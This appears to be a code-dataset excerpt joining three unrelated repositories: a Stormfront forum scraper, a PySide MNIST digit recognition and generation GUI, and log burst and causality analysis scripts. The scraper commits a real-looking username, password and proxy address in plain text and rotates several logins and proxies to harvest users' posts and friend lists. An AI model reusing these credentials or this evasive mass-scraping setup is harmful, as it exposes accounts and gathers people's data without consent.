page = 1
has_more_pages = True
while has_more_pages:
self.logger.info("# %s Scraping thread %s, page %s... " % (self.username, thread_id, page))
has_more_pages = self.fetch_thread_page(thread_id, page)
page += 1
Fetcher.short_pause()
thread_id = self.db.pop_thread()
self.logger.info("Thread scraping completed.")
def fetch_thread_page(self,tid,page):
    """Scrape one page of thread *tid*; store forum path, thread and posts.

    Returns True when the page has a 'next' link, else False.  Threads that
    do not exist or contain no posts are recorded via db.thread_failed().
    On page 1 the breadcrumb forums and the thread itself are stored too.
    """
    # headers = {
    #     'pragma': 'no-cache',
    #     'accept-encoding': 'gzip, deflate, sdch, br',
    #     'accept-language': 'en-US,en;q=0.8',
    #     'upgrade-insecure-requests': '1',
    #     'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
    #     'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    #     'cache-control': 'no-cache',
    #     'authority': 'www.stormfront.org',
    #     # 'cookie': cookie, #'gsScrollPos=;__cfduid=d3a7beab45ee0e73ce2785686259bcff41491228171; VRcheck=%2C339842%2C;bb2lastvisit=1493064370; bb2lastactivity=0; bb2sessionhash=a3ef28efe4019980f3c84ed019b33386',
    #     'referer': 'https://www.stormfront.org/forum/login.php?do=login',
    # }
    params = (
    )
    #r = self.scraper.get("https://www.stormfront.org/forum/t{}-{}/".format(tid,page),
    #                     headers=headers, params=params, cookies=self.cookies, timeout=self.timeout)
    r = self.get("https://www.stormfront.org/forum/t{}-{}/".format(tid,page),
                 headers=self.headers, params=params, cookies=self.cookies, timeout=self.timeout)
    tree = html.fromstring(r.content)
    #Does thread exist?
    error_message = "".join(tree.xpath("//td[@class='panelsurround']/div[@class='panel']/div//text()")).lower()
    if error_message.count("no thread specified.") > 0:
        #thread does not exist
        self.logger.warning("No thread specified message. Moving on.")
        self.db.thread_failed(tid,"no thread specified")
        return False
    elif error_message.count("invalid thread specified.") > 0:
        self.logger.warning("Invalid thread message. Moving on.")
        self.db.thread_failed(tid, "invalid thread specified")
        return False
    else:
        messages = tree.xpath("//div[@id='posts']//table[starts-with(@id,'post')]")
        if len(messages) == 0:
            self.logger.warning("No messages in thread. Moving on")
            self.db.thread_failed(tid, "no message found")
            return False
        #First page! Create thread and forums
        if page == 1:
            # breadcrumb anchors give the forum hierarchy; store each level
            # with its parent id (skip index 0, the site root)
            forums = tree.xpath("//span[@class='navbar']/a")
            # create forums
            parentid = None
            for fi in range(1, len(forums)):
                forumid = forums[fi].attrib["href"].split("/forum/f")[1][:-1]
                forumtitle = forums[fi].xpath("span/text()")[0]
                data = {'id': forumid, 'title': forumtitle, 'parent': parentid}
                self.db.add_forum(forumid,data)
                parentid = forumid
            threadtitle = tree.xpath("//td[@class='navbar']//strong/span[@itemprop='title']/text()")[0]
            # the first post's header row carries the thread creation date
            threaddate = ''.join(messages[0].xpath('.//td[@class="thead"][1]/text()')).strip()
            threaddateparse = Fetcher.parse_date(threaddate)
            data = {'id': tid, 'title': threadtitle, 'forum': parentid, 'createdate': threaddateparse, 'createdatestr': threaddate }
            self.db.add_thread(tid,data)
        #Process posts
        i = 0
        for message in messages:
            i = i + 1
            messageid = message.attrib['id'].split('t')[1]
            authorids = message.xpath('.//*[@class="bigusername"]')
            if len(authorids) == 0:
                #No author id, probably guest user
                authorid = 0
                self.logger.warning("No author id found for post. Assuming guest user.")
            else:
                authorid = authorids[0].attrib['href'].split('=')[1]
            datestr = ''.join(message.xpath('.//td[@class="thead"][1]/text()')).strip()
            dateparse = Fetcher.parse_date(datestr)
            #dateparse = datetime.datetime.strptime(datestr,"%m-%d-%Y, %I:%M %p")
            fullmessage = message.xpath(".//*[starts-with(@id,'post_message_')]")[0]
            fullmessagehtml = etree.tostring(fullmessage,encoding='UTF-8').decode("UTF-8")
            # post text excluding quoted <div> blocks
            cleanmessage = " ".join(fullmessage.xpath("./text()|./*[not(self::div)]//text()")).strip()
            signature = " ".join(message.xpath(".//div[@class='hidesig']//text()")).strip()
            titlem = message.xpath(".//td[@class='alt1']/div/strong/text()")
            if len(titlem) == 0:
                title = ""
            else:
                title = titlem[0]
            hasquote = False
            quoteofpostid, quoteofusername,quotehtml,quotetxt = None,None,None,None
            #if len(quote) > 0:
            # quote detection: a "Originally posted by" header with an anchor
            # pointing at another post
            quote = fullmessage.xpath(".//div/table//tr/td/div[1]/a")
            quotetop = fullmessage.xpath(".//div/table//tr/td/div[1]/text()")
            if len(quotetop) > 0 and quotetop[0].lower().count("originally posted by") and len(quote) > 0:
                hasquote = True
                if quote[0].attrib["href"].count("post") == 0:
                    #This is a quote of a newspaper or something else, not from a user. We don't treat it as a quote
                    hasquote = False
                else:
                    quoteofpostid = quote[0].attrib["href"].split("post")[1]
                    quoteofusernames = fullmessage.xpath(".//div/table//tr/td/div[1]/strong/text()")
                    if len(quoteofusernames) == 0:
                        quoteofusername = ""
                        self.logger.warning("No username quoted, but looks like user quote. Assuming email based username,")
                    else:
                        quoteofusername = quoteofusernames[0]
                    quotehtmls = fullmessage.xpath(".//div/table//tr/td/div[2]")
                    if len(quotehtmls) == 0:
                        self.logger.warning("Looks like quote, but can't find it. Just gonna skip it.")
                        hasquote = False
                    else:
                        quotehtml = etree.tostring(fullmessage.xpath(".//div/table//tr/td/div[2]")[0],encoding='UTF-8').decode("UTF-8")
                        quotetxt = " ".join(fullmessage.xpath(".//div/table//tr/td/div[2]//text()"))
            #ADD TO DATABASE
            data = {'id': messageid, 'authorid': authorid, 'posteddate': dateparse,
                    'fullmessagehtml': fullmessagehtml, 'cleanmessage': cleanmessage, 'signature': signature,
                    'title': title, 'hasquote': hasquote, 'quoteofpostid': quoteofpostid, 'quoteofusername': quoteofusername,
                    'quotehtml': quotehtml,'quotetxt': quotetxt}
            #pprint.pprint(data)
            self.db.add_post(messageid, data)
        #Is there a next page?
        return len(tree.xpath("//td[@class='alt1']/a[@rel='next']")) > 0
# Ad-hoc manual test entry point.
# SECURITY NOTE(review): real account credentials and a proxy address are
# committed here in plain text -- they should be moved out of the source.
if __name__ == '__main__':
    fetch = Fetcher("wickedness","tintolito","86.62.108.219:53281")
    fetch.login()
    #fetch.get_user_info(288029)
    fetch.fetch_thread_page(1170137,1)
    #fetch.get_user_friendlist(1)
    #fetch.fetch_thread_page(1213459, 1)
    # fetch.get_user_friendlist(2)
    # fetch.get_user_friendlist(3)
    # fetch.get_user_friendlist(4)
    # fetch.get_user_friendlist(5)
--- FILE SEPARATOR ---
from multiprocessing import Pool
import multiprocessing
import sys
import os
import random
import time
import database
import fetcher
db = None
def fetch_all_users_single():
    """Scrape all queued users with a single login/worker."""
    credentials = db.pop_login()
    fetch_all_users(credentials['username'], credentials['password'], credentials['proxy'])
def fetch_all_users_parallel():
    """Start one user-scraper process per available login (does not join them)."""
    workers = []
    for credentials in db.get_all_login():
        proc = multiprocessing.Process(
            target=fetch_all_users,
            args=(credentials['username'], credentials['password'], credentials['proxy']))
        workers.append(proc)
        proc.start()
    print("Out of loop.")
def fetch_all_users(username,password,proxy):
    """Log one account in and let it drain the user queue."""
    worker = fetcher.Fetcher(username, password, proxy)
    worker.login()
    worker.fetch_all_users()
def fetch_all_threads_parallel():
    """Start one thread-scraper process per available login (does not join them)."""
    workers = []
    for credentials in db.get_all_login():
        proc = multiprocessing.Process(
            target=fetch_all_threads,
            args=(credentials['username'], credentials['password'], credentials['proxy']))
        workers.append(proc)
        proc.start()
    print("Out of loop.")
def fetch_all_thread_single():
    """Scrape all queued threads with a single login/worker."""
    credentials = db.pop_login()
    fetch_all_threads(credentials['username'], credentials['password'], credentials['proxy'])
def fetch_all_threads(username,password,proxy):
    """Log one account in and let it drain the thread queue."""
    worker = fetcher.Fetcher(username, password, proxy)
    worker.login()
    worker.fetch_all_threads()
#
# login = db.pop_login()
# fetch = fetcher.Fetcher(login['username'], login['password'], login['proxy'])
#
# fetch.login()
#
# while(True):
# thread = db.pop_thread()
# id = thread['id']
#
# page = 1
# has_more_pages = True
# while has_more_pages:
# has_more_pages = fetch.fetch_thread_page(id, page, db)
# page += 1
# short_pause()
#
# db.thread_completed(id)
# Repeat:
# Login
# Repeat:
# Take a random un-fetched thread from database, mark as being under processing
# Fetch thread fetch_thread_page(cookie, 1208742, 1) #1208742
# Pause randomly
#sleep a bit
def query_yes_no(question, default="yes"):
    """Ask a yes/no question via input() and return the answer as a bool.

    *question* is the text shown to the user.  *default* is the answer
    assumed when the user just hits <Enter>: "yes" (the default), "no" or
    None (an explicit answer is then required).  Returns True for "yes",
    False for "no".
    """
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    prompts = {None: " [y/n] ", "yes": " [Y/n] ", "no": " [y/N] "}
    try:
        prompt = prompts[default]
    except KeyError:
        raise ValueError("invalid default answer: '%s'" % default)
    while True:
        sys.stdout.write(question + prompt)
        choice = input().lower()
        if default is not None and choice == '':
            return valid[default]
        if choice in valid:
            return valid[choice]
        sys.stdout.write("Please respond with 'yes' or 'no' "
                         "(or 'y' or 'n').\n")
### Callable functions
def print_instructions():
print("storm.py <COMMAND>")
print("Possible commands:")
print("--clean-data \t\t\t Removes all scraped data.")
print("--clean-login \t\t\t Removes all logins and proxies.")
print("--start-get-users <from_id> <to_id> \t\t\t Start download of users.")
print()
print("--populate-users <from_id> <to_id> \t\t\t Set user ids to download.")
print("--get-users \t\t\t Continue user download. All users in parallel.")
print("--get-users-single \t\t\t Continue user download. Single thread.")
print()
print("--populate-threads <from_id> <to_id> \t\t\t Set threads to download.")
print("--get-threads-single \t\t\t Continue previous user download.")
print("--get-threads-parallel \t\t\t Continue previous user download.")
print()
print("--add-proxy <IP> \t\t\t Add proxy to proxy list.")
print("--add-login <username> <password> \t\t\t Add new user to login list.")
print("--monitor-new-posts \t\t\t Continuously scrape new posts. NOT YET IMPLEMENTED.")
print("--monitor-new-users \t\t\t Continuously scrape new users. NOT YET IMPLEMENTED.")
def test(arg):
    """Debug helper: print *arg* with a counter 100 times at random speed."""
    for step in range(100):
        print(arg, step)
        time.sleep(random.random())
def main():
    """CLI dispatcher: parse sys.argv, open the database, run one command."""
    print("Starting up!")
    if len(sys.argv) < 2:
        print("Please provide arguments.")
        print_instructions()
        exit()
    command = sys.argv[1].strip()
    global db
    db = database.Database("stormfront")
    #Reset all interrupted processes and logins etc.
    db.set_all_logins_not_used()
    db.set_all_threads_not_used()
    db.set_all_users_not_used()
    # print(command,sys.argv[2].strip())
    if command == "--clean-data":
        if query_yes_no("Are you sure you want to empty database?", "no"):
            print('Cleaning database...')
            db.drop_all_data()
            db.create_indexes()
        else:
            print("Leaving database intact.")
    elif command == "--clean-login":
        if query_yes_no("Are you sure you want to empty database?", "no"):
            print('Cleaning database...')
            db.drop_login_and_proxy()
        else:
            print("Leaving database intact.")
    elif command == "--populate-users":
        if len(sys.argv) != 4:
            print_instructions()
            exit()
        print("Populating user database...")
        db.populate_users_to_be_fetched(int(sys.argv[2]),int(sys.argv[3]))
    elif command == "--get-users":
        print("Continuing user download parallelized...")
        fetch_all_users_parallel()
    elif command == "--get-users-single":
        print("Continuing user download single thread...")
        fetch_all_users_single()
    elif command == "--get-threads-single":
        print("Continuing thread download...")
        fetch_all_thread_single()
    # NOTE(review): the help text advertises --get-threads-parallel, but this
    # branch only matches --get-threads
    elif command == "--get-threads":
        print("Continuing thread download...")
        fetch_all_threads_parallel()
    elif command == "--populate-threads":
        if len(sys.argv) != 4:
            print_instructions()
            exit()
        print("Populating thread database...")
        # Add to thread database all number between fromid to toid.
        db.populate_threads_to_be_fetched(int(sys.argv[2]), int(sys.argv[3]))
    elif command == "--add-proxy":
        if len(sys.argv) != 3:
            print_instructions()
            exit()
        db.push_proxy(sys.argv[2])
    elif command == "--add-login":
        if len(sys.argv) != 4:
            print_instructions()
            exit()
        db.push_login(sys.argv[2],sys.argv[3])
    #TODO later
    #print("--monitor-new-posts \t\t\t Continuously scrape new posts.")
    #print("--monitor-new-users \t\t\t Continuously scrape new users.")
    else:
        print("Unknown instructions.")
        print_instructions()
#cookie = login()
#get_user_friendlist(1, cookie)
#get_user_info(336591, cookie)
#fetch_thread_page(cookie, 1208742, 1) #1208742
#there are 242542 users, 340190 ids
#2 fetch per user. 700,000 fetches.
# Script entry point.
if __name__ == '__main__':
    main()
|
[
"/database.py",
"/fetcher.py",
"/storm.py"
] |
0210-greyorange/Medical-model-visualization
|
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import cv2
import numpy as np
def nor(img, min=0, max=1):
    """Linearly rescale *img* so its values span [min, max].

    The parameters keep their historical names (min/max shadow the builtins)
    for backward compatibility.  BUGFIX: a constant-valued image previously
    caused a divide-by-zero (inf/nan output); it now maps every pixel to
    *min*.
    """
    img = np.asarray(img)
    lo = np.min(img)
    hi = np.max(img)
    if hi == lo:
        # zero dynamic range: avoid 0/0, return the lower bound everywhere
        return np.full(img.shape, float(min))
    image_new = (img - lo) * (max - min) / (hi - lo) + min
    return image_new
class ConvNet(nn.Module):
    """LeNet-style CNN for 1x28x28 grayscale digit images (10 classes).

    forward() returns log(softmax(logits)) of shape (batch, 10).
    """

    def __init__(self):
        super().__init__()
        # conv layers: (in channels, out channels, kernel size)
        self.conv1 = nn.Conv2d(1, 10, 5)   # 1 -> 10 channels, 5x5 kernel
        self.conv2 = nn.Conv2d(10, 20, 3)  # 10 -> 20 channels, 3x3 kernel
        # fully connected: 20*10*10 = 2000 features -> 500 -> 10 classes
        self.fc1 = nn.Linear(20 * 10 * 10, 500)
        self.fc2 = nn.Linear(500, 10)

    def forward(self, x):
        """Map a batch of (N, 1, 28, 28) images to (N, 10) log-probabilities."""
        batch = x.size(0)
        h = F.max_pool2d(F.relu(self.conv1(x)), 2, 2)  # 28x28 -> 24x24 -> 12x12
        h = F.relu(self.conv2(h))                      # 12x12 -> 10x10
        h = h.view(batch, -1)                          # flatten to (N, 2000)
        h = F.relu(self.fc1(h))
        return F.log_softmax(self.fc2(h), dim=1)
# Manual test: load trained weights and classify one image from disk.
if __name__ == '__main__':
    DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")  # use the GPU when available (much faster)
    model = ConvNet().to(DEVICE)
    my_net = torch.load(r"number.pth")  # path of the saved model weights
    model.load_state_dict(my_net)
    model.eval()
    img = cv2.imread(r"6.png", 0)  # flag 0 -> load as single-channel grayscale
    img = cv2.resize(img, (28, 28))  # scale to the 28x28 network input size
    img = nor(img)  # normalise pixel values into 0-1
    print(img.shape)
    import matplotlib.pyplot as plt  # display the image
    plt.imshow(img, cmap="gray")
    plt.show()
    img = torch.from_numpy(img).unsqueeze(0).unsqueeze(0).float().to(DEVICE)  # to a (1, 1, 28, 28) tensor
    output = model(img)  # predict
    pred = output.max(1, keepdim=True)[1]
    print(pred[0][0].data.cpu().numpy())  # tensor -> plain numpy value for printing
--- FILE SEPARATOR ---
import torch.utils.data
from torchvision.utils import save_image
import torch.nn as nn
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class generator(nn.Module):
    """Upsampling DCGAN-style generator: latent vector -> 1x28x28 image in [-1, 1].

    The latent batch is projected to num_feature (=1*56*56) features,
    reshaped to 1x56x56, refined by two same-size conv stages and finally
    downsampled by a stride-2 conv to 28x28.
    """

    def __init__(self, input_size, num_feature):
        super(generator, self).__init__()
        # latent -> 3136 features (reshaped to 1x56x56 in forward())
        self.fc = nn.Linear(input_size, num_feature)
        self.br = nn.Sequential(
            nn.ReLU(True),
            nn.InstanceNorm2d(1)
            # nn.BatchNorm2d(1),
        )
        self.downsample1 = nn.Sequential(
            nn.Conv2d(1, 50, 3, stride=1, padding=1),  # -> 50x56x56
            nn.ReLU(True),
            # nn.InstanceNorm2d(50)
            nn.BatchNorm2d(50)
        )
        self.downsample2 = nn.Sequential(
            nn.Conv2d(50, 25, 3, stride=1, padding=1),  # -> 25x56x56
            nn.ReLU(True),
            # nn.InstanceNorm2d(25)
            nn.BatchNorm2d(25),
        )
        self.downsample3 = nn.Sequential(
            nn.Conv2d(25, 1, 2, stride=2),  # -> 1x28x28
            nn.Tanh()
        )

    def forward(self, x):
        """Map a latent batch (N, input_size) to images (N, 1, 28, 28)."""
        out = self.fc(x).view(x.size(0), 1, 56, 56)
        out = self.br(out)
        out = self.downsample1(out)
        out = self.downsample2(out)
        return self.downsample3(out)
# Manual test: load trained generator weights and write sample images to disk.
if __name__ == '__main__':
    DEVICE = "cuda"  # NOTE(review): unused; the module-level `device` is what is applied below
    G = generator(100, 3136).to(device)
    my_net = torch.load("../generator.pth", map_location=torch.device('cpu'))  # load the saved model
    G.load_state_dict(my_net)
    num = 10  # number of images to generate
    for i in range(num):
        z = torch.randn(1, 100).to(device)
        # z = torch.ones(100).unsqueeze(0).to(device)
        # z = Variable(torch.randn(1, 100))
        fake_img = G(z)
        save_image(fake_img, './dccc_test/test_{0}.png'.format(i))
--- FILE SEPARATOR ---
# Minimal PySide demo: ask the user for a line of text with QInputDialog.
from PySide import QtGui, QtCore
# getText returns (text, ok_pressed)
reply = QtGui.QInputDialog.getText(None, "Ouija Central","Enter your thoughts for the day:")
if reply[1]:
    # user clicked OK
    replyText = reply[0]
else:
    # user clicked Cancel
    replyText = reply[0]  # which will be "" if they clicked Cancel
--- FILE SEPARATOR ---
from PySide2.QtWidgets import QApplication, QMainWindow, QPushButton, QPlainTextEdit, QMessageBox, QFileDialog, \
QTextBrowser, QLabel
from PySide2.QtUiTools import QUiLoader
from PySide2 import QtGui
from PySide2.QtCore import Signal, QObject,QCoreApplication
from PIL import Image
import torch.utils.data
from torchvision.utils import save_image
import os
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import torch
import torch.nn as nn
import torch.nn.functional as F
import cv2
import numpy as np
from Module.随机生成数字 import generator
import Module.识别数字 as RegconizeNum # 模块从Module包里导入“识别数字”
device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # 没gpu的话就用cpu
class MySignals(QObject):
    # Defines one signal whose payload is a str (here: a file path or a count).
    ms = Signal(str)
global_ms = MySignals()  # pushes an image path from the main window to the image window
input_num_ms = MySignals()  # pushes the requested image count from the input window to the main window
class ImgWindow():  # window that displays one image
    def __init__(self):
        super().__init__()
        # build the widget tree from the Qt Designer .ui file
        self.ui = QUiLoader().load('img_window.ui')
        self.ui.Button_exit.clicked.connect(self.exit_b)  # exit button
        global_ms.ms.connect(self.load_img)  # connect the image-path signal to its slot
    def exit_b(self):
        os.remove("temp.png")  # delete the generated temporary file
        self.ui.close()
    def load_img(self, object):
        # NOTE(review): parameter name `object` shadows the builtin; it holds the image path
        im = Image.open(object)  # re-save as png so QPixmap can always load it
        im.save('temp.png')
        pixmap = QtGui.QPixmap('temp.png')
        label = self.ui.img_label
        label.setPixmap(pixmap)  # show the picture in the label
        label.setScaledContents(True)  # scale the image to fit the label
class InputNumWindow():  # window where the user enters how many images to generate
    def __init__(self):
        self.ui = QUiLoader().load('input_num.ui')
        self.ui.ok_btn.clicked.connect(self.get_num)
        self.ui.cancel_btn.clicked.connect(self.close_ui)
    def get_num(self):
        # emit the entered count (as text) to the main window, then close
        num = self.ui.user_input_num.text()
        input_num_ms.ms.emit(num)
        self.close_ui()
    def close_ui(self):
        self.ui.close()
class MainWindow():  # main window
    """Main window: load a model file, open/generate digit images, predict.

    Fixes over the original: the local that shadowed the builtin `str` in
    input_randnum() is renamed, the no-op ``path.format(i)`` on an already
    formatted path is dropped, and the ``"\\H"`` invalid-escape literal is
    properly escaped (same resulting string).
    """
    def __init__(self):
        super().__init__()
        # build the widget tree from the Qt Designer .ui file
        self.ui = QUiLoader().load('my_ui.ui')
        self.ui.Button_loadmodel.clicked.connect(self.load_model)
        self.ui.Button_openimg.clicked.connect(self.open_img)
        self.ui.Button_randnum.clicked.connect(self.open_input_window)
        self.ui.Button_consequence.clicked.connect(self.predict_res)
        input_num_ms.ms.connect(self.get_mynum)
    def get_mynum(self,num):
        # slot: receive the requested image count, then generate the images
        self.my_num=num
        self.input_randnum()
    def load_model(self):
        """Let the user pick a .pth file and record its path in the log view."""
        FileDialog = QFileDialog(self.ui.Button_loadmodel)
        FileDialog.setFileMode(QFileDialog.AnyFile)  # any single file may be chosen
        model_file, _ = FileDialog.getOpenFileName(self.ui.Button_loadmodel, 'open file', './',
                                                   'model files (*.pth)')
        # the text after "路径:" is parsed back out by input_randnum()/predict_res()
        self.ui.View_model_log.setPlainText("成功加载模型\n模型路径:" + model_file)
    def open_img(self):
        """Let the user pick an image and show it in a separate window."""
        FileDialog = QFileDialog(self.ui.Button_openimg)
        FileDialog.setFileMode(QFileDialog.AnyFile)
        image_file, _ = FileDialog.getOpenFileName(self.ui.Button_openimg, 'open file', './Handwriting num pic',
                                                   'Image files (*.jpg *.gif *.png *.jpeg)')
        if not image_file:
            QMessageBox.warning(self.ui.Button_openimg, "警告", "文件错误或打开文件失败!", QMessageBox.Yes)
            return
        self.ui.View_img_log.setPlainText("成功加载图片\n图片路径:" + image_file)
        self.window2 = ImgWindow()
        global_ms.ms.emit(image_file)  # the window must exist before the signal fires
        self.window2.ui.show()
    def open_input_window(self):
        self.window3 = InputNumWindow()
        self.window3.ui.show()
    def input_randnum(self):
        """Generate self.my_num random digit images with the loaded generator."""
        num = int(self.my_num)
        G = generator(100, 3136).to(device)
        model_file = self.ui.View_model_log.toPlainText().split('路径:')[1]  # saved model path
        my_net = torch.load(model_file, map_location=torch.device('cpu'))  # map to CPU when there is no GPU
        G.load_state_dict(my_net)
        filename = "Handwriting num pic"
        current_path = os.getcwd()
        path_item = os.listdir(current_path)  # everything in the current directory
        picfile_path = "{}\\Handwriting num pic".format(current_path)  # folder path shown to the user
        if filename not in path_item:
            os.mkdir(filename)  # create the output folder on first use
        for i in range(num):
            z = torch.randn(1, 100).to(device)
            fake_img = G(z)
            path = "./{}/pic_{}.png".format(filename, i + 1)  # output path for this image
            save_image(fake_img, path)
        msg = "成功生成{num}张手写数字图\n图片路径:{path}".format(num=num, path=picfile_path)
        self.ui.View_randnum_log.setPlainText(msg)
    def predict_res(self):
        """Classify the currently opened image with the loaded ConvNet."""
        image_file = self.ui.View_img_log.toPlainText().split('路径:')[1]
        img = cv2.imread(image_file, 0)  # flag 0 -> single-channel grayscale
        img = cv2.resize(img, (28, 28))  # scale to the 28x28 network input size
        img = RegconizeNum.nor(img)  # normalise to 0-1
        DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        img = torch.from_numpy(img).unsqueeze(0).unsqueeze(0).float().to(DEVICE)  # to a (1, 1, 28, 28) tensor
        model = RegconizeNum.ConvNet().to(DEVICE)
        model_file = self.ui.View_model_log.toPlainText().split('路径:')[1]  # saved model path
        my_net = torch.load(model_file)
        model.load_state_dict(my_net)
        model.eval()
        output = model(img)  # predict
        pred = output.max(1, keepdim=True)[1]
        self.ui.View_predict_log.setPlainText("预测识别的结果为:" + str(pred[0][0].data.cpu().numpy()))
# Application entry point: create the Qt app, show the main window, run the event loop.
app = QApplication([])
start = MainWindow()
start.ui.show()
app.exec_()
|
[
"/Module/识别数字.py",
"/Module/随机生成数字.py",
"/QInputDialog.py",
"/my_first.py"
] |
0225kazuki/log_causal_analysis
|
import tools.search_burst as sb
--- FILE SEPARATOR ---
#!/usr/bin/python
import numpy as np
import pandas as pd
import datetime
import search_burst as sb
import plot_day
import pickle
import search_burst as sb
import sqlite3
'''
burst - burstを探す
edge-coburstのevpairに対して,
ev1とev2共にバーストが起きている日(共起かは見ていない) & エッジが引かれた日
を出している。
'''
def cnt_logs(DUMP_NAME,DATE):
    """Return the number of log entries in dumps/<DATE>/<DUMP_NAME>."""
    dump = sb.open_dump('dumps/' + str(DATE) + '/' + DUMP_NAME)
    return len(dump)
def get_eday(evp):
    """Return the days ('YYYYMMDD' strings) on which the event pair *evp* has
    an edge recorded in the causality database.

    *evp* is a pair of "srcID_srcHost"-style strings.  Uses the module-level
    sqlite3 cursor `cur` opened in the __main__ block.

    BUGFIX/hardening: the statement is now built with DB-API "?"
    placeholders instead of str.format, so quotes in host names can no
    longer break (or inject into) the SQL.  SQLite's type affinity still
    matches string parameters against numeric srcID/dstID columns.
    """
    fields = []
    fields.extend(evp[0].split("_"))
    fields.extend(evp[1].split("_"))
    query = (
        'select date from date where pairID in('
        'select pairID from event where '
        '(srcID=? and srcHost=? and dstID=? and dstHost=?) or '
        '(srcID=? and srcHost=? and dstID=? and dstHost=?));'
    )
    cur.execute(query, (fields[0], fields[1], fields[2], fields[3],
                        fields[2], fields[3], fields[0], fields[1]))
    # dates are stored as YYYY-MM-DD; strip the dashes
    return ["".join(row[0].split("-")) for row in cur.fetchall()]
# For every co-burst event pair, find days where both events burst AND an
# edge exists in the causality DB; pickle the matches to 'burst_burst_all'.
if __name__ == "__main__":
    dbname = 's4causality.db'
    conn = sqlite3.connect(dbname)
    cur = conn.cursor()
    edge_burst = sb.open_dump('rp_edge_coburst')
    print(len(edge_burst))
    burst = sb.open_dump('burst_df')
    burst_ev = [x for x in burst.columns if len(burst[x].dropna()) != 0]  # events with at least one burst day
    result = []
    for evp in edge_burst['EvPair']:
        # normalise numpy datetime64 index values to YYYYMMDD strings
        bday1 = burst[evp[0]].dropna().index.values
        bday1 = [str(x).split('T')[0].replace("-","") for x in bday1]
        bday2 = burst[evp[1]].dropna().index.values
        bday2 = [str(x).split('T')[0].replace("-","") for x in bday2]
        bday = list(set(bday1) & set(bday2))  # days when both events burst (not necessarily co-occurring)
        eday = get_eday(evp)
        if len(set(bday) & set(eday)) != 0:
            anddays = list(set(bday) & set(eday))
            result.append((evp,anddays))
    with open('burst_burst_all','wb') as f:
        pickle.dump(result,f)
    conn.close()
    exit()
--- FILE SEPARATOR ---
import collections
import pprint
import re
import sys
import time
import numpy as np
import pybursts
import math
from concurrent import futures
from itertools import chain
import pickle
import datetime
import burst_detect_all as bd
def open_dump(dump_file):
    """Load and return the single pickled object stored in *dump_file*."""
    with open(dump_file, "rb") as fh:
        return pickle.load(fh, encoding="bytes")
def burst_detect_from_dump(DUMP_NAME):
    """Load a pickled list of datetimes from DUMP_NAME and run burst
    detection on the seconds-of-day series.

    Returns the result of bd.burst_detect() applied to {1: time_list}.
    """
    try:
        obj = open_dump(DUMP_NAME)
    except Exception:  # narrowed from bare except (kept best-effort exit)
        print("Input should be dump path");exit()
    # Timestamps as seconds since midnight, ascending.
    time_list = sorted(x.hour*3600 + x.minute*60 + x.second for x in obj)
    # Nudge duplicate timestamps forward by 0.01 s so every offset is
    # unique.  BUG FIX: the previous loop enumerated time_list[1:] but
    # wrote to time_list[i], updating the element one position too far
    # left; restored the full-list scan (same pattern as the working
    # copy in burst_detect_all's __main__).
    cur_t = -1
    for i, t in enumerate(time_list):
        if cur_t == t:
            time_list[i] = round(time_list[i-1]+0.01, 3)
        else:
            cur_t = t
    time_lists = {1: time_list}
    print(time_lists)
    return bd.burst_detect(time_lists)
if __name__ == "__main__":
    # CLI entry point: argv[1] is the path to a pickled datetime list.
    print(burst_detect_from_dump(sys.argv[1]))
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
python busrt_detect_all.py
'''
import collections
import pprint
import re
import sys
import time
import numpy as np
import pybursts
import math
from concurrent import futures
from itertools import chain
import pickle
import datetime
import subprocess
'''
レベルの重複削除
Before
[[0 7079 65511]
[1.0 54134 55689]
[2.0 54134 55689]
[3.0 55655 55689]
[4.0 55655 55689]
[5.0 55655 55689]
[6.0 55655 55689]
[7.0 55655 55689]
[8.0 55655 55689]
[9.0 55655 55689]
[10.0 55655 55689]]
After
[[2.0 54134 55689]
[10.0 55655 55689]]
'''
class Node():
    """One burst interval in the burst containment tree.

    st/en are start/end offsets in seconds, lv the burst level, and
    cnt the number of log events falling inside [st, en].
    """

    def __init__(self, parent, st, en, lv, cnt, depth=0):
        self.parent = parent
        self.st = st
        self.en = en
        self.lv = lv
        self.cnt = cnt
        self.children = []
        self.depth = depth

    def add_node(self, added_node):
        """Attach *added_node* as a child and update its links."""
        added_node.parent = self
        added_node.depth = self.depth + 1
        self.children.append(added_node)

    def dens(self):
        """Events per minute over [st, en]; 0 for a zero-length span."""
        span = self.en - self.st
        return 0 if span == 0 else round(self.cnt / span * 60, 2)

    def value(self):
        """Summary row: [level, start, end, count, density]."""
        return [self.lv, self.st, self.en, self.cnt, self.dens()]
# Run burst detection with p_num worker processes; the per-group time
# lists are dealt round-robin (largest first) so workloads stay balanced.
def m_burst_detect(time_lists, p_num):
    p_num = min(p_num, len(time_lists))
    by_size = sorted(time_lists.items(),
                     key=lambda kv: len(kv[1]),
                     reverse=True)
    shards = [dict() for _ in range(p_num)]
    for pos, (key, vals) in enumerate(by_size):
        shards[pos % p_num][key] = vals
    pool = futures.ProcessPoolExecutor(max_workers=p_num)
    return list(chain.from_iterable(pool.map(burst_detect, shards)))
def burst_detect(time_lists):
    """Run Kleinberg burst detection on each {key: seconds-of-day list}.

    Returns [(key, [[level, start, end, count, density], ...]), ...]
    with one summary row per first-layer burst in the containment tree.
    """
    burst_result = []
    for ind, v in time_lists.items():
        time_list = list(v) # copy, so the caller's list is not mutated
        if len(time_list) > 30: # skip sparse groups
            # Optionally pad the endpoints to 0 / 86400 (disabled)
            # if time_list[-1] < 86400:
            #     time_list.append(86400)
            # if time_list[0] != 0:
            #     time_list.insert(0, 0)
            # Burst detection
            burst_list = pybursts.kleinberg(sorted(set(time_list)),
                                            s=2, gamma=1.0)
            # Remove duplicated levels: zero rows whose (start, end)
            # match the following row, then delete the zeroed rows.
            for j in range(len(burst_list)-1):
                if not any([x-y for x, y in zip(burst_list[j][1:],
                                                burst_list[j+1][1:])]): # identical start and end
                    burst_list[j] = [0, 0, 0]
